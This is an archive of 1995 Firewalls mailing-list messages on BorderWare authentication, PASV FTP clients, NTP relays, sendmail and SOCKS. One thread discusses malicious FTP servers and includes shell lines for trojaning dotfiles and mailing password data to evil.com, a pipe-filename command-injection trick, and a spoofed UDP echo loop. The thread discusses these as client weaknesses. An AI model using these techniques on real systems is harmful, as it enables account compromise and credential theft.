Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA29971 for firewalls-outgoing; Tue, 16 May 1995 15:42:19 -0700 Received: from northshore.ecosoft.com (northshore.ecosoft.com [192.233.85.129]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id PAA29966 for ; Tue, 16 May 1995 15:42:16 -0700 Received: from [198.115.177.220] (slip-0-20.shore.net) by northshore.ecosoft.com with SMTP id AA10742 (5.67a/IDA-1.5 for ); Tue, 16 May 1995 18:41:40 -0400 Message-Id: <199505162241.AA10742@northshore.ecosoft.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Mon, 15 May 1995 17:46:58 -0500 To: firewalls@greatcircle.com From: vin@shore.net (Vin McLellan) Subject: Re: BorderWare (previously "JANUS") Cc: billcurr@cyberspace.com, Stephen.L.Arnold@Arnold.Com, smoubray@dcc.com, scott@disclosure.com, cbk@ingress.com, pokey@maddie.atlantic.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Steve Arnold reported on BorderWare, including the firewall's user authentication options: >Security tokens are extra. They resell CRYPTOCard challenge-response >tokens (like me) and Security Dynamics time-synchronization tokens. For >SecurID, the ACE server runs on the box in the first release. In a >later release you can use an existing ACE server on your internal net, >thus having a single security database. Charles Kaplan offered additional info and added: >> Crypto Card runs as you say on the box, SecurID still isn't released. >> It has been announced as under development, and I among others look >> forward to seeing it later this summer. My Security Dynamics file includes an April 10 press release in which SDI announced its agreement with Border Network Technologies to provide SecurID tech on BorderWare. I don't think SDI's ACE Server -- which will transparently support authentication calls through a client on the BorderWare host -- ever "runs on the (firewall) box." The BorderWare box, which is not straight Unix, certainly does not run it. Border said it would offer BorderWare with the SecurID hook during Q2, but it isn't yet mentioned as an option on their web server. On schedule, it should be available within the next few weeks. You can bet your job on that, since we all know vendors never slip a deadline. Suerte, _Vin - -- Vin McLellan + The Privacy Guild + USA Tel. (617) 884-5546 Mail: 53 Nichols St., Chelsea, Ma. 02150 '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' From firewalls-owner Tue May 16 17:31:35 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA01709 for firewalls-outgoing; Tue, 16 May 1995 17:10:40 -0700 Received: from world1.worldbit.com (gw.worldbit.com [199.4.64.236]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id RAA01704 for ; Tue, 16 May 1995 17:10:34 -0700 Received: (blast@localhost) by world1.worldbit.com (8.6.10/A/UX 3.1) id RAA01316; Tue, 16 May 1995 17:19:39 -0700 Date: Tue, 16 May 1995 17:19:38 -0700 (PDT) From: Tim Keanini To: firewalls@greatcircle.com Subject: PASV Mac or Windows Client Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am trying to locate a PASV ftp client for Mac and Windows. I cant use Netscape or Mosaic because this if for uploading files. I checked out the lastest Fetch and Anarchie and they both DO NOT do PASV. If anyone is using such an animal please send mail the URL or just the name of it. --blast %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% \ Tim Keanini | "The limits of my language, / / aka blast | are the limits of my world." \ \ | --Ludwig Wittgenstein / / | \ \ +================================================/ / for more info on BayMOO... \ \ email baymoo@worldbit.com / %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% From firewalls-owner Tue May 16 18:31:30 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA02654 for firewalls-outgoing; Tue, 16 May 1995 18:20:47 -0700 Received: from uu11.psi.com (uu11.psi.com [38.8.24.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id SAA02649 for ; Tue, 16 May 1995 18:20:44 -0700 Received: by uu11.psi.com (5.65b/4.0.940727-PSI/PSINet) via UUCP; id AA02769 for ; Tue, 16 May 95 21:10:18 -0400 Received: from blacksun.tyecin.com by tyecin.com (4.1/3.2.012693-TYECIN Systems); id AA07266 for worldbit.com!blast; Tue, 16 May 95 17:57:21 PDT Received: (from lanning@localhost) by blacksun.tyecin.com (8.6.10/8.6.10) id RAA05821; Tue, 16 May 1995 17:59:25 -0700 From: Bob Lanning Message-Id: <199505170059.RAA05821@blacksun.tyecin.com> Subject: Re: PASV Mac or Windows Client To: blast@worldbit.com (Tim Keanini) Date: Tue, 16 May 1995 17:59:24 -0700 (PDT) Cc: firewalls@greatcircle.com In-Reply-To: from "Tim Keanini" at May 16, 95 05:19:38 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 1336 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ---- As written by Tim Keanini: > > > I am trying to locate a PASV ftp client for Mac and Windows. > I cant use Netscape or Mosaic because this if for uploading files. > I checked out the lastest Fetch and Anarchie and they both DO NOT do > PASV. > > If anyone is using such an animal please send mail the URL or just the > name of it. > > --blast Netscape can use socks/proxies. Configuration is under options->preferences->Mail and Proxies _________________________________________________________________________ | Robert Hajime Lanning | ____________ | | Systems Administrator | "No more blah, blah, /\ _________\ | | TYECIN Systems, Inc. | blah!" \ \ \______ / | | Four Main Street | -- Kirk, "Miri" \ \ \ / / / | | Los Altos, California 94022 | stardate 2713.6 \ \ \/ / / | | Voice: (415) 949-8501 | \ \/ / / | | Fax: (415) 949-8505 | "Emotions are alien to me. \ / / | | E-Mail: lanning@tyecin.com | I'm a scientist." \/_/ | | "Software Tools for | -- Spock, "This Side of Paradise" | | Manufacturing Management" | stardate 3417.3 | |_____________________________|_________________________________________| From firewalls-owner Tue May 16 19:01:19 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA02904 for firewalls-outgoing; Tue, 16 May 1995 18:36:57 -0700 Received: from home.aads.net (home.aads.net [198.111.96.6]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id SAA02899 for ; Tue, 16 May 1995 18:36:54 -0700 Received: (jgs@localhost) by home.aads.net (8.6.11/aads1.1) id VAA01658; Tue, 16 May 1995 21:36:46 -0400 From: John Scudder Message-Id: <199505170136.VAA01658@home.aads.net> Subject: Re: PASV Mac or Windows Client To: blast@worldbit.com (Tim Keanini) Date: Tue, 16 May 1995 21:36:46 -0400 (EDT) Cc: firewalls@GreatCircle.COM In-Reply-To: from "Tim Keanini" at May 16, 95 05:19:38 pm X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 427 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > I am trying to locate a PASV ftp client for Mac and Windows. > I cant use Netscape or Mosaic because this if for uploading files. > I checked out the lastest Fetch and Anarchie and they both DO NOT do > PASV. Actually, Anarchie does do PASV. To enable it: Under Edit, Choose "Firewalls". This will bring up a dialog box with a checkbox to turn on PASV. Happy FTP'ing. --John Scudder Ameritech Advanced Data Services From firewalls-owner Tue May 16 19:24:31 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA03088 for firewalls-outgoing; Tue, 16 May 1995 18:48:17 -0700 Received: from tuna.wang.com (tuna.wang.com [150.124.136.4]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id SAA03083 for ; Tue, 16 May 1995 18:48:14 -0700 Received: from elf.wang.com by tuna.wang.com with SMTP id AA29242 (5.67b/IDA-1.5 for ); Tue, 16 May 1995 21:47:55 -0400 Received: from fnord.wang.com by elf.wang.com with SMTP id AA05709 (5.67a/IDA-1.5 for ); Tue, 16 May 1995 21:39:59 -0400 Received: by fnord.wang.com (5.67a/TF8) id AA03741; Tue, 16 May 1995 21:47:48 -0400 Date: Tue, 16 May 1995 21:47:48 -0400 From: Tom Fitzgerald Message-Id: <199505170147.AA03741@fnord.wang.com> To: firewalls@greatcircle.com Subject: NTP on a bastion system Sender: firewalls-owner@GreatCircle.COM Precedence: bulk mitubori@tsi.co.jp writes: > Has anynone knowed and experienced about some tools that > relay traffic back and forth between two NTP servers. > They must run on a bastion system (FWTK,SunOS4.1.4). For that platform the best ntp packet forwarder is xntpd.... If there's some reason you can't run it, udprelay can do this. ftp.wang.com:/pub/fitz/udprelay-0.2.tar.Z udprelay is mainly useful on platforms like SCO where the system clock is so shaky that xntpd can't be used to feed the time to other systems reliably. -- Tom Fitzgerald 1-508-967-5278 Wang Labs, Lowell MA, USA fitz@wang.com From firewalls-owner Tue May 16 19:31:16 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA03574 for firewalls-outgoing; Tue, 16 May 1995 19:03:12 -0700 Received: from moose.usmcs.maine.edu (moose.usmcs.maine.edu [130.111.131.39]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id TAA03569 for ; Tue, 16 May 1995 19:03:09 -0700 Received: by moose.usmcs.maine.edu (5.57/Ultrix3.0-C) id AA26522; Tue, 16 May 95 22:03:08 -0400 Received: by doc.usmcs.maine.edu; (5.65/1.1.8.2/28Mar95-0848PM) id AA06492; Tue, 16 May 1995 22:02:49 -0400 From: Edward Maillet Message-Id: <9505170202.AA06492@doc.usmcs.maine.edu> Subject: Malicious Servers. Do clients guard against? (FTP example) To: firewalls@greatcircle.com Date: Tue, 16 May 1995 22:02:49 -0400 (EDT) X-Mailer: ELM [version 2.4 PL24] Content-Type: text Content-Length: 1109 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hey All, I've got another question for you all. Malicious (sp?) Servers. Do client programs (or proxies) look for attacks against the client? Here's a sample of what I mean. This example is FTP but could easily apply to HTTP if I read the spec right. Suppose I at me.com have (for whatever reason) a Malicious FTP server that tries to get the client to "get" files it didn't ask for. These file(s) are say basic trojan horses for normal commands (ls,copy, etc.). If I can "convince" your client to get these files and you execute the "trojan'd" command in the right directory (or have it in the path) Wham! (or something more subtle) Here's are the details of how I'd do it: The mget command for FTP issues (amoung other things) an NLST command which requests from the server a list of file names. An "mget *.ps" generates an NLST *.ps. The client then retrieves each of the files in the list. Would your FTP client notice if in the returned list of file names some names don't match the *.ps request? Do clients or proxies guard against this kind of attack? ----- Ed Maillet maillet@usmcs.maine.edu From firewalls-owner Tue May 16 19:45:57 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA03148 for firewalls-outgoing; Tue, 16 May 1995 18:51:28 -0700 Received: from maddie.atlantic.com (maddie.atlantic.com [198.252.200.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id SAA03136 for ; Tue, 16 May 1995 18:51:23 -0700 Received: (pokey@localhost) by maddie.atlantic.com (8.6.10/8.6.9) id VAA19673; Tue, 16 May 1995 21:35:41 -0400 From: Rick Romkey Message-Id: <199505170135.VAA19673@maddie.atlantic.com> Subject: Re: BorderWare (previously "JANUS") To: vin@shore.net (Vin McLellan) Date: Tue, 16 May 1995 21:35:40 -0400 (EDT) Cc: firewalls@GreatCircle.COM, billcurr@cyberspace.com, Stephen.L.Arnold@Arnold.Com, smoubray@dcc.com, scott@disclosure.com, cbk@ingress.com In-Reply-To: <199505162241.AA10742@northshore.ecosoft.com> from "Vin McLellan" at May 15, 95 05:46:58 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 1024 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > My Security Dynamics file includes an April 10 press release in which SDI > announced its agreement with Border Network Technologies to provide > SecurID tech on BorderWare. > > I don't think SDI's ACE Server -- which will transparently support > authentication calls through a client on the BorderWare host -- ever "runs > on the (firewall) box." The BorderWare box, which is not straight Unix, > certainly does not run it. Last I heard, the BorderWare firewall will support the ACE Server as a client when it is released. The reason it won't run local on the server itself is mainly to keep costs down. For the record, BorderWare IS straight Unix...you just don't get any (or little) access to it. > Border said it would offer BorderWare with the SecurID hook during Q2, but > it isn't yet mentioned as an option on their web server. On schedule, it > should > be available within the next few weeks. You can bet your job on that, > since we all know vendors never slip a deadline. No comment! 8^). -Rick From firewalls-owner Tue May 16 19:46:47 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA02940 for firewalls-outgoing; Tue, 16 May 1995 18:38:26 -0700 Received: from world1.worldbit.com (gw.worldbit.com [199.4.64.236]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id SAA02935 for ; Tue, 16 May 1995 18:38:21 -0700 Received: (blast@localhost) by world1.worldbit.com (8.6.10/A/UX 3.1) id SAA01489; Tue, 16 May 1995 18:47:20 -0700 Date: Tue, 16 May 1995 18:47:20 -0700 (PDT) From: Tim Keanini To: Bob Lanning cc: firewalls@greatcircle.com Subject: Re: PASV Mac or Windows Client In-Reply-To: <199505170059.RAA05821@blacksun.tyecin.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 16 May 1995, Bob Lanning wrote: > ---- As written by Tim Keanini: > > I am trying to locate a PASV ftp client for Mac and Windows. > > I cant use Netscape or Mosaic because this if for uploading files. > > I checked out the lastest Fetch and Anarchie and they both DO NOT do > > PASV. > > If anyone is using such an animal please send mail the URL or just the > > name of it. > Netscape can use socks/proxies. Configuration is under > options->preferences->Mail and Proxies My second line states that I need it to send file outbound. There is no way that I know of to 'STOR' a file with Netscape or Mosaic. --blast %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% \ Tim Keanini | "The limits of my language, / / aka blast | are the limits of my world." \ \ | --Ludwig Wittgenstein / / | \ \ +================================================/ / for more info on BayMOO... \ \ email baymoo@worldbit.com / %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% From firewalls-owner Tue May 16 20:03:35 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA04942 for firewalls-outgoing; Tue, 16 May 1995 19:51:12 -0700 Received: from smurfland.cit.buffalo.edu (smurfland.cit.buffalo.edu [128.205.10.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id TAA04937 for ; Tue, 16 May 1995 19:51:09 -0700 Received: (jcmurphy@localhost) by smurfland.cit.buffalo.edu (8.6.11/8.6.4) id WAA14440; Tue, 16 May 1995 22:50:39 -0400 From: Jeff Murphy Message-Id: <199505170250.WAA14440@smurfland.cit.buffalo.edu> Subject: Re: Malicious Servers. Do clients guard against? (FTP example) To: maillet@doc.usmcs.maine.edu (Edward Maillet) Date: Tue, 16 May 1995 22:50:38 -0400 (EDT) Cc: firewalls@GreatCircle.COM In-Reply-To: <9505170202.AA06492@doc.usmcs.maine.edu> from "Edward Maillet" at May 16, 95 10:02:49 pm X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 961 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Edward Maillet writes: >Here's are the details of how I'd do it: >The mget command for FTP issues (amoung other things) an NLST command which >requests from the server a list of file names. An "mget *.ps" generates an >NLST *.ps. The client then retrieves each of the files in the list. >Would your FTP client notice if in the returned list of file names some >names don't match the *.ps request? assuming this happens, how would this affect the end user? i'm assuming that the ftp daemon ships over a bunch of *.ps files and also something called "ls", in hopes that you have the current dir as the first item in your path and that you quit and type "ls"... for this to work you need to know the OS that you are sending the files to. another problem is that files brought over wont (for unix at least) be executable at first... am i missing your point? what other security aspects are there to shipping over a file that wasnt requested? jeff From firewalls-owner Tue May 16 22:01:15 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA07060 for firewalls-outgoing; Tue, 16 May 1995 21:38:35 -0700 Received: from cyber.zone.net (cyber.zone.net [198.240.0.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id VAA07053 for ; Tue, 16 May 1995 21:38:32 -0700 Received: (spacey@localhost) by cyber.zone.net (8.6.11/8.6.11) id AAA20261; Wed, 17 May 1995 00:38:04 -0400 From: "Peter C. Norton" Message-Id: <199505170438.AAA20261@cyber.zone.net> Subject: Re: Malicious Servers. Do clients guard against? (FTP example) To: jcmurphy@smurfland.cit.buffalo.edu (Jeff Murphy) Date: Wed, 17 May 95 0:38:04 EDT Cc: firewalls@greatcircle.com In-Reply-To: <199505170250.WAA14440@smurfland.cit.buffalo.edu>; from "Jeff Murphy" at May 16, 95 10:50 pm X-Mailer: ELM [version 2.3 PL11] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > >requests from the server a list of file names. An "mget *.ps" generates an > >NLST *.ps. The client then retrieves each of the files in the list. > >Would your FTP client notice if in the returned list of file names some > >names don't match the *.ps request? > i'm assuming that the ftp daemon ships over a bunch of *.ps > files and also something called "ls", in hopes that you > have the current dir as the first item in your path and that > you quit and type "ls"... All right. substitute .profile and .cshrc and .zshrc and .script for ls and have a quick test for sed and awk or perl on the user's next logout (won't work the first time, of course) and depending on what the server's owner likes to hack in, something like echo "ps | grep sh | kill -9 -" >> ~/.logout; ln ~/.logout ~/.bash_logout # or whatever shell[s] someone would want to accomodate echo "sh .script" >> .logout; where sh is a little shell script that can check for perl, or any number of other scripting languages, open an ftp connection to the original host, get the right script, and then execute it. the new script automagically runs passwd, and voila... broken system. grep $USER | mail ftp@evil.com. if there are no shadow passwords then ftp@evil can verify the password from the sent mail, and mailing allows for ftp@evil.com to know where he wants to spend his next few hours. I know that what I'm saying is unix specific, but it's not hard to target a specific platform. How many times do you think that a windows user has downloaded from a /pub/src/linux or /pub/archives/comp/sources/unix. And how many root users on unix boxes download from the /pub/mswin or /pub/os9 directories? I just checed my local default ftp and found that it can expand the ~ in the local file field for a get, which to me means that it should do the same thing if mget returned ~/.login or something. And if not, most unix users don't alias ls to ls -a. Anyway, I think I've answered the "how can you assume that a specific platform can be targeted per attack" and the "how to get a file executed" questions. I think that every os I know has a default set of startup files that can be written to. On a Mac it could overwrite the users and groups prefs file. And if you're root on a unix system, this seems to be a golden attack. There's got to be something that makes this untenable, or it would have happened a long time ago. I think. I don't consider myself a guru, but I can understand how this attack can happen. should we start to look out for it? -|-Peter From firewalls-owner Tue May 16 22:31:56 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA08154 for firewalls-outgoing; Tue, 16 May 1995 22:30:29 -0700 Received: from california.sandia.gov (california.sandia.gov [146.246.250.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id WAA08149 for ; Tue, 16 May 1995 22:30:26 -0700 Received: (from jim@localhost) by california.sandia.gov (8.6.11/1.15) id WAA26278; Tue, 16 May 1995 22:30:04 -0700 Date: Tue, 16 May 1995 22:30:04 -0700 From: jim@california.sandia.gov (Jim Hutchins) Message-Id: <199505170530.WAA26278@california.sandia.gov> To: jcmurphy@smurfland.cit.buffalo.edu, spacey@cyber.zone.net Subject: Re: Malicious Servers. Do clients guard against? (FTP example) Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >> >requests from the server a list of file names. An "mget *.ps" generates an >> >NLST *.ps. The client then retrieves each of the files in the list. >> >Would your FTP client notice if in the returned list of file names some >> >names don't match the *.ps request? > >All right. substitute .profile and .cshrc and .zshrc and .script >for ls and have a quick test for >sed and awk or perl on the user's next logout (won't work the first >time, of course) and depending on what the server's owner likes >to hack in, something like >echo "ps | grep sh | kill -9 -" >> ~/.logout; ln ~/.logout ~/.bash_logout > # or whatever shell[s] someone would want to accomodate >echo "sh .script" >> .logout; > > [...] > >I know that what I'm saying is unix specific, but it's not hard to target >a specific platform. Why be so indirect. Just have the server return a filename of "|some_command and args". Most UNIX ftp clients will happily take it and run the command right then and there. You can even do something simple like a "sh" and send the shell script over in the data ftp transfers to save to this "file". The basic problem is a client trusting information returned from an untrusted server and acting upon it without user oversight. It applies as much to ftp with an mget as it does to http grabbing a Postscript file containing embedded commands. ---------------------------------------------------------------- James A. Hutchins Phone: 1-510-294-2416 Sandia National Laboratories FAX: 1-510-294-1225 P.O. Box 969, MS9011 EMail: jim@ca.sandia.gov Livermore, CA 94551-0969 From firewalls-owner Wed May 17 00:01:16 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA08831 for firewalls-outgoing; Tue, 16 May 1995 23:34:09 -0700 Received: from noc1.mid.net (noc1.mid.net [198.247.250.15]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id XAA08825 for ; Tue, 16 May 1995 23:34:05 -0700 Received: (from alan@localhost) by noc1.mid.net (8.6.10/8.6.9) id BAA26619 for firewalls@greatcircle.com; Wed, 17 May 1995 01:33:33 -0500 From: Alan Hannan Message-Id: <199505170633.BAA26619@noc1.mid.net> Subject: Sendmail Question To: firewalls@greatcircle.com Date: Wed, 17 May 1995 01:33:32 -0500 (CDT) X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 2145 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I have a question regarding sendmail configuration over a firewall. This firewall is using smap to receive mail, and sendmail to send the outgoing mail. The topology looks something like the following: Untrusted Trusted World ---- Firewall ----- Mailhost -- PostOffice1 | +---- PostOffice2 | +---- PostOffice3 We want the following to happen: All mail from the internal trusted hosts will arrive at the Firewall with destination addresses and from addresses. We want all outgoing mail to appear to be originating from user@domain.name (ie user@foo.com). This will require the outgoing from header to be rewritten. We want all incoming mail to the Firewall to parse through an aliases file which may rewrite the outgoing email address. Also, all mail destined for the internal network will be handed off to the internal Mailhost. The Mailhost is not intelligent enough to rewrite headers, so we must rewrite the headers with the firewall such that it identifies to which post office the mail is destined. I realize this is not a normal function of a fw, however this is going to have to be as such. --- Two things. Rewrite To headers based on an aliasees file, and rewrite outgoing from addresses if they are NOT to a set of hosts. I can make the outgoing headers be rewritten, however it will then change the destination addresses within the domain to user@domain.name. I can make the sendmail parse the aliases file and hand it off to the mailhost correctly, but then mail that "replies" to sent mail from the internal hosts is destined for user@PostOfficeX.domain.name, instead of user@domain.name. I could use MX records to make PostOfficeX.domain.name have two destinations, firewall and mailhost, with mailhost a higher priority, to "hop" it through, however this is not preferred. I have struggled with this for some time, and have not been able to figure out how to do it. Any help appreciated. I apologize if this is too narrow of a concern, though I can see this configuration being of use in many firewall configurations. -- Alan Hannan alan@mid.net From firewalls-owner Wed May 17 00:31:23 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA09382 for firewalls-outgoing; Wed, 17 May 1995 00:28:28 -0700 Received: from inesc.inesc.pt (inesc.inesc.pt [146.193.0.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id AAA09377 for ; Wed, 17 May 1995 00:28:19 -0700 Received: from ccae-sv.inesc.pt by inesc.inesc.pt with SMTP; id AA15041 (/); Wed, 17 May 1995 09:24:49 +0200 Received: from beatle by ccae-sv.inesc.pt (4.1/SunOS4.1.3) id AA20038; Wed, 17 May 95 09:27:59 +0200 Message-Id: <9505170727.AA20038@ccae-sv.inesc.pt> Comments: Authenticated sender is From: "Ricardo Pereira" Organization: CCAE To: Firewalls@GreatCircle.COM Date: Wed, 17 May 1995 09:26:10 +0000 Subject: Info on proxy servers Reply-To: ricardo.pereira@inesc.pt Priority: normal X-Mailer: Pegasus Mail for Windows (v2.0-WB3) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >From what I know, though never implemented it myself, you could use socks. For that you would need the following setup : - Renumber your internal network to use RFC 1597 reserved address space. Notice that not all machines would have to be renumbered, only those that would require access to the Internet. This address space has at least an A class, and several B classes what should be enough for most cases. - Use clients that support socks. I am not too familiar with Mac products, but in the PC arena there are some applications supporting this : Trumpet, Netscape 1.1, PC/TCP(?),... In the Unix case all you would need is to compile new clients included with socks distribution. -Install a Socks server having 2 ip addresses : one legal, and the other from the class selected from RFC1597. This thing works based on the following. Applications using socks don't see IP addresses as associated with an interface, and so valid Internet addresses must not match with the IP you are in. They simply transport that information to a server they know. Now you would have to watch out for something: -If you renumber all internal network no problem -If you don't, then you must ensure that when you talk to other internal addresses, you don't go by socks, but when you refer to internet you go ! This may be simple if you impose something like : all external access must be through Netscape, and no internal access is done with Netscape. That way the only point of "socksifying" is a single application. Because this matter is tricy, I would like to hear from you, if you reach some different possibilities. TIA, Ricardo __________________________________________________________________ Ricardo Jorge Pereira Network Consultant Centro de Comunicacoes em Ambientes Empresariais Av. Duque d'Avila 23, Apartado 10105, 1017 Lisboa Codex, Portugal Telef : +351 1 3100069 Fax : +351 1 3100068 email : ricardo.pereira@inesc.pt ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Microsoft is not the answer, Microsoft is the question. No is the answer. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From firewalls-owner Wed May 17 03:01:21 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id CAA12415 for firewalls-outgoing; Wed, 17 May 1995 02:49:09 -0700 Received: from edelweb.fr (edelweb.fr [193.51.12.16]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id CAA12410 for ; Wed, 17 May 1995 02:49:03 -0700 Received: from champagne.edelweb.fr (champagne.edelweb.fr [193.51.12.33]) by edelweb.fr (8.6.10/8.6.9) with ESMTP id LAA01054; Wed, 17 May 1995 11:48:44 +0200 Received: from localhost (touvet@localhost) by champagne.edelweb.fr (8.6.10/8.6.6) with SMTP id LAA05881; Wed, 17 May 1995 11:48:42 +0200 Message-Id: <199505170948.LAA05881@champagne.edelweb.fr> To: ari@soscorp.com (Ari Shamash) Cc: Scott Barman , firewalls@greatcircle.com Subject: Re: Requesting "echo" In-reply-to: <199505161838.OAA13270@fearless.soscorp.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Wed, 17 May 1995 11:48:27 +0200 From: Jean-Christophe Touvet Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Not blocking the echo port (port 7) or somehow preventing packets with > spoofed IP addresses from entering the system could be even more > disasterous to a site. Consider this scenario: > > A packet enters the network with a spoofed IP address (say of the > backup server), with source port 514 (port for remote shell), and the > payload consisting of a valid RSH-type "header" and content. This > packet then gets echoed back to the backup server with the IP source > address of the client. If the server trusts this host (and most > backup hosts must, so remote dumps can happen), then what? Hmm, I'm not sure it would be such easy with TCP services. But there is at least one very annoying attack with UDP echo: send a spoofed UDP packet with both source and destination port=7. Guess what ? -JCT- From firewalls-owner Wed May 17 03:31:26 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id DAA12516 for firewalls-outgoing; Wed, 17 May 1995 03:04:25 -0700 Received: from death.netsys.com (death.netsys.com [204.160.179.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id DAA12511 for ; Wed, 17 May 1995 03:04:22 -0700 Received: (from len@localhost) by death.netsys.com (8.6.10/HQ-Len) id DAA00274 for firewalls@GreatCircle.COM; Wed, 17 May 1995 03:03:40 -0700 From: len@NETSYS.COM (Len Rose) Message-Id: <9505170303.ZM272@death.netsys.com> Date: Wed, 17 May 1995 03:03:39 -0700 X-Phone: 415-528-7205 X-Mailer: Z-Mail (2.1.5 20sep93) To: firewalls@GreatCircle.COM Subject: ACE SecureID Flaw (SunOS 4.1.x) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Has anyone noted that ACE has linked their code against /usr/5lib/libc.so.2.9, which unfortunately has the braindead resolver (NIS/hosts)? This has critical ramifications for anyone who is smart enough to avoid NIS within/without their networks. Unfortunately when I tried to explain the ramifications of this to their tech support folks, they didn't seem to understand why it was a problem. They need to get with the program and link against the real resolver routines in libc.so.1.9.x that use BIND (or at least offer 2 versions of the binaries) This may not be a critical problem for sites with a handful of hosts, but when you have a few thousand machines or routers.. *sigh* Len (ldd aceserver) -lc.2 => /usr/5lib/libc.so.2.9 -ldl.1 => /usr/lib/libdl.so.1.0 ldd sdshell -lkvm.0 => /usr/lib/libkvm.so.0.3 -lc.2 => /usr/5lib/libc.so.2.9 -ldl.1 => /usr/lib/libdl.so.1.0 ldd sdadmin -lc.2 => /usr/5lib/libc.so.2.9 -ldl.1 => /usr/lib/libdl.so.1.0 From firewalls-owner Wed May 17 03:50:06 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id DAA12931 for firewalls-outgoing; Wed, 17 May 1995 03:30:58 -0700 Received: from madiran.icdc.fr (madiran.icdc.fr [192.134.193.58]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id DAA12925 for ; Wed, 17 May 1995 03:30:51 -0700 Received: from gis ([158.156.97.7]) by madiran.icdc.fr (8.6.10/8.6.9) with ESMTP id LAA07744 for ; Wed, 17 May 1995 11:39:38 +0200 Received: from hal9000.icdc.fr (hal9000 [158.156.97.254]) by gis (8.6.10/8.6.10) with SMTP id LAA23234 for ; Wed, 17 May 1995 11:35:48 +0200 Received: by hal9000.icdc.fr (5.0/SMI-SVR4) id AA03974; Wed, 17 May 1995 11:37:45 +0200 Date: Wed, 17 May 1995 11:37:45 +0200 From: ct@gis.icdc.fr (Christian Tournaire) Message-Id: <9505170937.AA03974@hal9000.icdc.fr> To: firewalls@GreatCircle.COM Subject: PPP or SLIP package for Sun Sparc X-Sun-Charset: US-ASCII content-length: 254 Sender: firewalls-owner@GreatCircle.COM 